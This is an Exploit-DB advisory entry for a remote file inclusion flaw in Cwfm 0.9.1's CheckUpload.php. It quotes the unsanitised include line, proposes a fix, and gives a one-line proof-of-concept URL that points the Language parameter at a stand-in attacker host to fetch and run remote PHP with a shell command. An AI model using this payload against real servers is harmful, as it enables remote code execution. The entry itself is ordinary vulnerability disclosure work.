EXPLOITS

Cwfm 0.9.1 - 'Language' Remote File Inclusion

Author: Philipp Niedziela
type: webapps
platform: php
port: 80.0
date_added: 2006-08-07  
date_updated: 2016-09-01  
verified: 1  
codes: OSVDB-27857;CVE-2006-4077  
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comCwfm-0.9.1.tar.gz  

raw file: 2151.txt  

+--------------------------------------------------------------------
+
+ Cwfm-0.9.1 (Language) Remote File Inclusion
+
+ Original advisory:
+
+ http://www.bb-pcsecurity.de/Websecurity/301/org/Cwfm-0.9.1_(Language)_Remote_File_Inclusion.htm
+
+--------------------------------------------------------------------
+
+ Affected Software .: Cwfm 0.9.1
+ Venedor ...........: http://cwfm.sourceforge.net/
+ Class .............: Remote File Inclusion in /CheckUpload.php
+ Risk ..............: high (Remote File Execution)
+ Found by ..........: Philipp Niedziela
+ Contact ...........: webmaster[at]bb-pcsecurity[.]de
+                      http://www.bb-pcsecurity.de
+
+--------------------------------------------------------------------
+
+ Code /CheckUpload.php
+
+ .....
+ session_start();
+ include_once("Global.php");
+ //include_once("lang/$Language.php");
+ include_once("$Language.php");
+ .....
+
+--------------------------------------------------------------------
+
+ $Language is not properly sanitized before being used.
+
+--------------------------------------------------------------------
+
+ Solution:
+ Declare $Language before using, include config-file or
+ denie direct access to the vuln file.
+
+--------------------------------------------------------------------
+
+ PoC:
+
+ http://[target]/CheckUpload.php?Language=http://evilsite.com/dblib.php/&cmd=ls
+
+--------------------------------------------------------------------
+
+ Note:
+ Venedor contacted, but no response. So do a dirty patch.
+
+-------------------------[ E O F ]----------------------------------

# milw0rm.com [2006-08-08]